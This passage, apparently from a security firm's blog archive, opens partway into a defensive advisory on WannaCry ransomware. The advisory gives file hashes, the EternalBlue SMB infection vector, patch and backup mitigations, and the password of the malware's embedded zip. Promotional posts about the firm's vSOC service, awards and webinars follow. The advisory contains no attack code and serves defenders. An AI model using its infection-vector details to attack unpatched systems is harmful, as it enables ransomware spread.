  • 7bf2b57f2a205768755c07f238fb32cc
  • 7f7ccaa16fb15eb1c7399d422f8363e8

Once a system is infected with the ransomware, a screen similar to the following image appears informing the user of the infection as well as the ransom price and bitcoin address where the payment can be made.

WCrypt

The infection also typically spawns a large number of processes which are the result of the encryption process as well as the desktop theme changes and the decryptor listener.

Infection Vector: Eternal Blue

In the latest dump of the ShadowBroker’s exploits, Eternal Blue was considered especially dangerous due to its use of SMB v1 as the attack vector. This vulnerability was assigned the designation CVE-2017-0143, 0144, 0145, 0146, and 0147, it contains multiple avenues of attack and most Windows operating systems are vulnerable. This has been determined to be the method of infection from multiple sources, including Matthew Hickey, aka HackerFantastic, a reknown malware and security researcher. Of particular note is the presence of worm characteristics in the delivery. Once infected, the system becomes a part of the botnet for pushing the malware out.

Identifying Eternal Blue and the WCrypt Attack

A recently released screenshot, from malware researcher Kafiene, displays the traffic patterns for the Eternal Blue exploit.

Wcrypt Logs

As is evidenced in the image, most traffic is seen using port 445, whch is the standard port used by SMB v1 and v2. Network monitoring is essential to identify threats as they appear.

Mitigation

In order to mitigate this attack, it is recommended that:

  • All systems be updated to the latest patch available from Microsoft. The patch specific to the exploit kit is labeled KB4012598 or MS17-010 and should be evaluated for deployment immediately if it has not already been applied. This will prevent the SMB traffic from exploiting the vulnerability, and eliminates initial infection vectors.
  • Application whitelisting be applied to prevent any applications from running which are not from a specified location or signed by the whitelisted vendor.
  • You create and maintain offline backups of critical data which will reduce the amount of damage a crypto- ransomware attack is capable of inflicting.
  • You ensure your antivirus definitions are up to date. Most major anti-virus vendors have been provided samples of this malware and have developed detections and definitions. Currently, approximately 31 out of 60 A/V vendors tested can recognize and stop this infection. Major vendors not included in the list include Symantec and Sophos.

Matthew Hickey of Hacker House discovered the decryption binary in a zip file in the PE resources which is encrypted with the password of WNcry@2ol7. This can be used to potentially decrypt the files which were affected by the malware.

Final Analysis

The infections which have been occurring lead vSOC to believe these are not necessarily targeted attacks, rather the infection vectors are exploited automatically by the Eternal Blue exploit kit against vulnerable systems within the enterprise.

References:

GuidePoint Security Placed on CRN MSP 500 List for Excellence in Managed IT Services

GuidePoint Security recently made their debut on CRN’s elite 2017 Managed Service Provider 500 (MSP) list in the Managed Security 100 category.

The prestigious annual list is comprised of organizations that have demonstrated excellence in their Managed IT services and North American solution providers with cutting-edge approaches to delivering managed services. Their offerings help companies navigate the complex and ever-changing landscape of IT, improve operational efficiencies, and maximize their return on IT investments.

“GuidePoint’s vSOC Managed Security Services have experienced tremendous growth over the past two years and our inclusion on this list validates that the market is taking notice,” noted Justin Morehouse, GuidePoint Security’s Co-founder and Principal.

“We pride ourselves on our World Class customer satisfaction rating and believe that we are truly advancing the industry through our innovative approach to partnering with our customers to achieve their mission,” Morehouse said.

He cited GuidePoint’s exclusive managed services, Virtual Security Operations Center (vSOC) as one the best examples of the team’s coordinated efforts to level the playing field in terms of providing a customized solution that fits all budgets and organizational sizes, while identifying threats and vulnerabilities and creating a safer cyber environment.

“Managed service providers play an increasingly important role in the day-to-day operations of businesses across North America,” said Robert Faletra, CEO of The Channel Company. “MSPs help organizations streamline their spending, effectively allocate limited resources, and benefit from advanced expertise in the latest technologies. We congratulate the service providers on CRN’s 2017 MSP500 list, who have continually succeeded in meeting their customers’ changing needs and help them get the most out of their IT investments.”

CRN’s MSP 500 list shines a light on the most forward-thinking and innovative of these key organizations.

The list is divided into three categories: the MSP Pioneer 250, recognizing companies with business models weighted toward managed services and largely focused on the SMB market; the MSP Elite 150, recognizing large, data center-focused MSPs with a strong mix of on-premise and off-premise services; and the Managed Security 100, recognizing MSPs focused primarily on off-premise, cloud-based security services.

CRN® is a brand of The Channel Company.

The MSP500 list is featured in the February 2017 issue of CRN and online at www.CRN.com/msp500.

©2017. The Channel Company, LLC. CRN is a registered trademark of The Channel Company, LLC. All rights reserved.

GuidePoint Security showcases vSOC technology at RSA 2017

Forward thinking security professionals recognize that the current progression and magnitude of cyber threats is insurmountable for the understaffed security industry to effectively tackle.

There is, however, a solution.

Join GuidePoint Security for an informative Virtual Security Operations Center (vSOC) presentation at RSA 2017. During the vSOC presentation, you’ll learn about how GuidePoint’s managed security services can assist you with identifying threats and vulnerabilities through detection, response, and recovering from validated incidents.

Presentation Location: CrowdStrike Booth #2345, South Hall
Presentation Days/Times: Tuesday, 12:30 p.m. and Wednesday and Thursday, 11:30 a.m.

GuidePoint Security’s vSOC analysts and incident responders, supported by CrowdStrike Falcon Host, offer best-in-breed endpoint protection. Together, they offer one of the most comprehensive around-the-clock endpoint and security monitoring solutions on the market – all with the efficiency and scalability of cloud-based security management.

GuidePoint’s vSOC ingests Falcon Host platform data into the vSOC Detect monitoring platform, powered by Splunk. By monitoring endpoints and correlating endpoint data against other security-related information, vSOC analysts actively hunt for and discover new and emerging threats.

If you can’t make the presentation in the exhibit hall, our team will offer free, private demonstrations of our vSOC. All you have to do is sign up, and a GuidePoint representative will be in touch to set up a time to meet with you during the RSA Conference. Register now for your exclusive vSOC demo.

Not attending RSA or don’t have time to visit with us? You can register for our webinar, Stay Ahead of Adversaries Using Next-Gen Endpoint Security, on March 9th.

GuidePoint’s Expertise Supports Your Organization’s GSA HACS Contract Needs

Imagine this: Your network is compromised with outbound connections sending data to foreign countries, and your information security team has no idea.

That’s exactly what GuidePoint Security’s analysts and incident responders discovered while actively cyber hunting for a new client in our Virtual Security Operations Center (vSOC).

Our professionals discovered open connections to more than 30 foreign countries, even though the client had no foreign interests or customers. Using Splunk’s Enterprise Security application, our team put its geolocation capabilities to work and created a map to illustrate all the foreign locations that successfully received this data.

When we alerted the client to the connections, we used the map to show the extent of the compromise. The client agreed to implement egress rules on its firewalls to limit destinations for data transfers, as well as country-blocking technologies in its perimeter security appliances to deny connections to foreign countries. By working with GuidePoint, the client narrowed the scope of who has access to its enterprise network and improved its overall security posture.

This real-world example of cyber hunting for data exfiltration is one of the many ways GuidePoint can support your organization with your General Services Administration (GSA) Highly Adaptive Cybersecurity Services (HACS) contract needs.

GSA recently awarded GuidePoint all four HACS Special Items Numbers (SINs), including, 132-45C: Cyber Hunt. The others SINs include: 132-45A: Penetration Testing; 132-45B: Incident Response; and 132-45D: Risk and Vulnerability Assessment.

With these SINs, GuidePoint’s subject matter experts can help your organization with all of your information security needs. As a federal or state/local government client, your organization will have:

  • Access to pool of technically evaluated cybersecurity vendors
  • Rapid ordering and deployment of services
  • Reduction in open market ordering and contract duplication
  • Cybersecurity/acquisition support resources from GSA

For more information about how GuidePoint has helped clients, download the full text of our SINs Use Cases.

For additional information and pricing on our IT professional and cybersecurity services, visit https://www.guidepointsecurity.com/contracts.

Automation Tools Help with Real-Time Incident Response and Protection

Free webinar: Real-world examples of how to keep your environment secure from attacks, accelerate remediation

If you’re an information security professional responsible for incident response, you may feel frustrated and overburdened by all the manual processes needed to keep your environment safe.

You’re not alone.

In a recent Enterprise Strategy Group survey, more than 60 percent of information technology professionals say their organization has taken steps to automate incident response, but 91 percent say those processes are not effective or efficient.

Did you know there are resources and tools available to help facilitate some of these key processes for your organization? GuidePoint Security’s Virtual Security Operations Center (vSOC) analysts and incident responders have real-world experience using these types of tools. One such tool, Carbon Black, helps power GuidePoint’s vSOC enabling analysts and responders to hunt for incidents in real time, visualize the complete attack kill chain, and efficiently defend environments from attacks.

Here are some examples of how they have successfully used Carbon Black to stop incidents and monitor endpoints:

PowerShell Watchlist

Recently, GuidePoint analysts used Carbon Black to create a PowerShell watchlist for an unauthorized user attempt. Once alerted, analysts tracked down a malicious remote address and shut down unauthorized privileges on the host.

Environment audits

In another instance, vSOC analysts used Carbon Black to audit an environment to limit privilege account credentials. The audit alerted analysts to a possible vulnerability that could have allowed unrestricted access to a domain.

PUA/PUP activity

vSOC analysts recently used Carbon Black to create a custom watchlist for PUA/PUP activity. They found an instance that stood out from others and located an unapproved IE toolbar, which was loaded without approval on multiple workstations. The toolbar was isolated as a threat because it had the ability to monitor web-browsing behaviors.

Would you like to know more about these real-world incident response examples and how you can move from playing incident response catch-up to proactively hunting for threats?

Join GuidePoint and Carbon Black for a free, interactive webinar, “Conquering Challenges of Incident Response: Real-Time Hunting and Response,” at 2:30 p.m. Thursday, Nov. 17. The session will last about 45 minutes, with a chance to interact with the presenters, Stephen Jones, GuidePoint’s director of managed services, and Justin Scarpaci, technical solutions lead, Carbon Black.

Register online here.

About the presenters

Stephen Jones has more than 10 years of experience in information technology and cyber security. He specializes in security operations and has extensive experience working within the Department of Defense and the Intelligence Community.

Justin Scarpaci is a technical account manager on the Partner Success team at Carbon Black. In that role, he assists IR/MSSP partners with operationalizing Carbon Black as part of their service offerings. Justin served in the Marine Corps and has worked in multiple security roles for a defense contractor. He has a master’s degree in information security and forensics.

Can’t make the webinar? No worries. Go ahead and register now and we will send you a recording after the live presentation.

About GuidePoint Security

Headquartered in Herndon, Virginia, GuidePoint Security provides innovative and valuable cyber security solutions and expertise that enable organizations to successfully achieve their mission. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at: http://www.guidepointsecurity.com.

The Cyber Hunt Is On: Quickly Find New and Emerging Threats

Free webinar explains how you can respond to intrusions faster

Do your security analysts have limited time and resources? Are they bogged down searching through logs instead of actively hunting for potential intrusions on your network?

In a free webinar, “Active Cyber Hunting Revealed: How vSOC Identifies Threats in Your Environment,” security experts from GuidePoint Security and CrowdStrike will show you how you can more efficiently correlate data and begin your own cyber hunt for potential threats to your environment.

This free, educational webinar begins at  2 p.m. EDT Wednesday, Aug. 24, 2016. Register here now.

During the webinar, participants will learn how CrowdStrike Falcon can be integrated into a Virtual Security Operations Center (vSOC) for endpoint monitoring. By using Falcon Connect API to ingest host data into the vSOC monitoring platform, analysts can correlate endpoint data against SIEM security logs. The combination makes it easier to discover new and emerging threats.

Participants will learn how to do ad-hoc searches and queries, quickly conduct comprehensive investigations, identify insider threat activity, and create dashboards and reports.

Following the presentation, there will be a 15-minute question and answer session. Even if your schedule is full and you can’t tune-in live, go ahead and register now and we’ll send you a recording you can watch later.

Presenters will be Stephen Jones, GuidePoint Security’s director of managed services, and Kris Merritt, senior director of hunting operations for CrowdStrike.

Stephen has more than 10 years of experience in information technology and cybersecurity within the Department of Defense and Intelligence Community. His primary focus has been Information Assurance (IA) and Computer Network Defense (CND).

Kris leads CrowdStrike’s internal and external hunting programs. He has more than 10 years of experience in cybersecurity and network defense, mainly in leadership roles of security operations, incident response, digital forensics, signature development, indicator management, and tactical tool development within large enterprise networks.

“I look forward to presenting alongside Stephen on how CrowdStrike Falcon Host’s continuous endpoint visibility immediately enables SOCs and hunters to detect, analyze, and respond to intrusions at a time scale once only dreamed about,” Kris said. “Operating at this time scale has provided unique insights into malicious behavior where a human actor or even malware is involved.”

“CrowdStrike uses these insights, along with rich visibility on the endpoint, to rapidly refine its approach to the threat, Kris explained. “I’m excited about our partnership with a company like GuidePoint who is eager to use the best technology to provide the best service to their customers.”

For more information about GuidePoint and how security experts like Stephen can help you make the most of vSOC services, visit www.guidepointsecurity.com. For more information about CrowdStrike and to connect with Kris and his team, visit www.crowdstrike.com.

Don’t forget to register for this free, interactive webinar here.

About GuidePoint Security

GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their mission. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM). Learn more at: http://www.guidepointsecurity.com.

GuidePoint Security’s vSOC and Prelert’s AD Strike Back Against DROWN

In a recent blog article titled, Star Wars X – Attack of the DROWNs: Machine Learning-based Anomaly Detection Detects the DROWN SSLv2 Vulnerability, Prelert announced the ability to detect Decrypting RSA with Obsolete and Weakened eNcryption (DROWN) attacks using machine-based learning through the Prelert Anomaly Detective (AD) tool. The widespread nature of the vulnerabilities related to DROWN means that it is highly likely there are still many vulnerable servers in the wild that could benefit from the watchful eye of Prelert AD operated by the trained network defenders of a managed security service like GuidePoint Security’s Virtual Security Operations Center (vSOC). vSOC leverages the power of Prelert’s AD to enhance the native detection capabilities of our Splunk-centric monitoring platform. The DROWN use case, in addition to many other co-developed use cases, provides vSOC with finely tuned anomaly detection that enables us to quickly identify, validate, and report critical security incidents to our customers. Stay tuned to the GuidePoint vSOC blog for other joint efforts and collaborative projects all focused on the protection of enterprise networks and data through advanced monitoring and hunting techniques.

About GuidePoint Security

GuidePoint Security LLC provides customized, innovative and valuable information security solutions and proven cyber security expertise that enable commercial and federal organizations to successfully achieve their security and business goals. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.

vSOC: Not Your Father’s Security Operations Center

GuidePoint’s vSOC Disrupts the Market with Numerous Differentiators

Basic CMYK
GuidePoint Security’s Virtual Security Operations Center (vSOC) is shaking up the Managed Security Services Provider (MSSP) market by offering an unrivaled enterprise security monitoring service brimming with differentiators. vSOC has taken the concepts of the traditional enterprise Security Operations Center (SOC), virtualized them and embedded them in the Amazon Web Services (AWS) cloud. Our cloud-based architecture allows us to leverage dynamic scaling of compute and storage resources to build a robust and flexible monitoring infrastructure.

Flexibility and Customization

GuidePoint has purposefully built the vSOC offering to be agile and customizable. vSOC strives to be a minimally invasive supplement to your existing security operations while providing maximum return on investment (ROI) and value to the security of your enterprise. Our flexibility and configurability options ensure a custom fit that provides the services and support you need without paying for things you don’t.

Cloud-based Implementation

vSOC is a cloud-based enterprise security solution architected and implemented in Amazon Web Services (AWS). AWS provides a robust and secure cloud environment with state-of-the-art compute and storage resources, encryption and automation capabilities. vSOC can dynamically provision and grow customer resources as needed, transparently and effortlessly, to ensure consistent levels of operation and performance.

Splunk Enterprise

vSOC’s enterprise monitoring solution leverages the extensibility and analytical power of Splunk to provide unparalleled security monitoring and event correlation. GuidePoint has enhanced and extended the native capabilities of Splunk Enterprise with the addition of integrated applications to provide vSOC analysts with comprehensive security dashboards and workflows that reduce the mean time to detection, resulting in quicker notification and remediation of security incidents. Additionally, GPS has enriched Splunk’s native correlation capabilities through strategic partnerships with global threat intelligence aggregators and providers.

Volume-Based Pricing

Our pricing model addresses the common feeling of being “nickel and dimed” by your MSSP every time a new information system or log source is added to the network. vSOC uses volume-based pricing to provide maximum flexibility to the customer to provision and remove network resources as needed. Our volume tiers directly correlate to the amount of log data vSOC will ingest in a 24-hour period.

Ownership of Data

Regardless of whether your security logs are in your security tools or the vSOC monitoring platform, the data is yours and you should have access to it. vSOC’s monitoring platform has been purposefully built without proprietary data formats or unnecessary restrictions on the customer’s ability to access their own data at any time. All vSOC customers are provided with accounts to their Splunk implementations so they can create their own searches, view dashboards and reports, and interact with the data any way they see fit.

Virtual Team of Experienced Security Professionals

vSOC not only leverages the well-trained cyber security analysts dedicated to our customers, but also has access to the breadth and depth of technical expertise throughout the entire company. GuidePoint’s staff of highly-trained and experienced professionals can be utilized by the vSOC analysts to consult on difficult security matters or to provide insight into challenging incidents. Our virtual team of experienced security professionals ensure that no customer is ever without an answer or solution to even the most challenging security incident or event.

More Than a Security Operations Center

vSOC customers, as part of the GuidePoint family, have access to other security services and support without having to seek out other potentially unknown and untrusted vendors. GuidePoint’s reputation as “Trusted Advisors” to our customers means we have the ethics and experience needed to consult on a wide range of security matters. From making recommendations for best of breed security tools, security services and much more, GuidePoint can help.

About GuidePoint Security

GuidePoint Security, LLC provides customized, innovative and valuable information security solutions and proven cyber security expertise that enable commercial and federal organizations to successfully achieve their security and business goals. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, and with offices in Georgia, Massachusetts, Michigan, Minnesota, Missouri, Florida, Texas, and North Carolina, GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.